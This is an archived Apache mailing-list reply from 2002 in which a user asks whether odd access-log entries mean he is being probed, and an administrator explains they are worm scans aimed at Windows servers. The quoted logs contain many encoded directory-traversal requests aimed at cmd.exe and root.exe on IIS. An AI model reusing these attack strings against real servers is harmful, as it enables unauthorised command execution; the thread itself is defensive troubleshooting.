httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Jack L. Stone" <jackst...@sage-one.net>
Subject Re: Am I being probed?
Date Sun, 28 Jul 2002 16:01:34 GMT
At 06:03 PM 7.28.2002 +0200, eric wrote:
>Greetings!
>
>I'm a newbie when it comes to many *nix things and Apache is one of them.  
>
>I have two machines, one running Suse 8.0 and the other running WinME.  Both 
>of them are hooked up to a LinkSys EtherFast DSL router.  My Suse box is 
>running Apache 2.0.39.
>
>I use WinMe to connect to the web server.  It's address is 192.168.1.100 and 
>the Suse box is 192.168.1.101.
>
>I was going through my Apache access log and found these entries:
>
>217.228.40.62 - - [27/Jul/2002:19:16:05 +0200] "GET /scripts/root.exe?/c+dir 
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:10 +0200] "GET /MSADC/root.exe?/c+dir 
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:15 +0200] "GET 
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:21 +0200] "GET 
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:27 +0200] "GET 
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:32 +0200] "GET 
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:38 +0200] "GET 
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:44 +0200] "GET 
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
ystem32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:50 +0200] "GET 
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:16:56 +0200] "GET 
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:17:02 +0200] "GET 
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:17:08 +0200] "GET 
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:17:14 +0200] "GET 
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.228.40.62 - - [27/Jul/2002:19:17:19 +0200] "GET 
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.228.40.62 - - [27/Jul/2002:19:17:25 +0200] "GET 
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.40.62 - - [27/Jul/2002:19:17:31 +0200] "GET 
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>
>
>217.235.140.189 - - [27/Jul/2002:19:45:51 +0200] "GET
/scripts/root.exe?/c+dir 
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET /MSADC/root.exe?/c+dir 
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET 
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET 
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET 
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET 
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET 
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET 
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
ystem32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET 
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET 
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:55 +0200] "GET 
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:55 +0200] "GET 
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET 
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET 
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET 
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.235.140.189 - - [27/Jul/2002:19:45:57 +0200] "GET 
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>
>
>217.228.92.217 - - [27/Jul/2002:20:30:53 +0200] "GET 
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.228.92.217 - - [27/Jul/2002:20:30:54 +0200] "GET 
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>217.228.92.217 - - [27/Jul/2002:20:30:56 +0200] "GET 
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>217.228.92.217 - - [27/Jul/2002:20:30:57 +0200] "GET 
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>
>
>80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET /scripts/root.exe?/c+dir 
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET /MSADC/root.exe?/c+dir 
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET 
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET 
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET 
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET 
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET 
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET 
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
ystem32/cmd.exe?/c+dir 
>HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET 
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET 
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET 
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET 
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET 
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET 
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
>80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET 
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>80.60.131.235 - - [28/Jul/2002:13:37:55 +0200] "GET 
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
>
>
>and there's a few more.
>
>What's going on here?  Is there anyway I can find out?  Should I bother?  
>Should I care?
>
>Thanks, Eric
>
You would only need to care if you were running a WIN server... it is
probably the "script kiddies" trying to wreak some havoc by trying to run
their scripts (worm) on yours/any machine in its search on the net....

Best regards,
Jack L. Stone,
Administrator

SageOne Net
http://www.sage-one.net
jackstone@sage-one.net

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message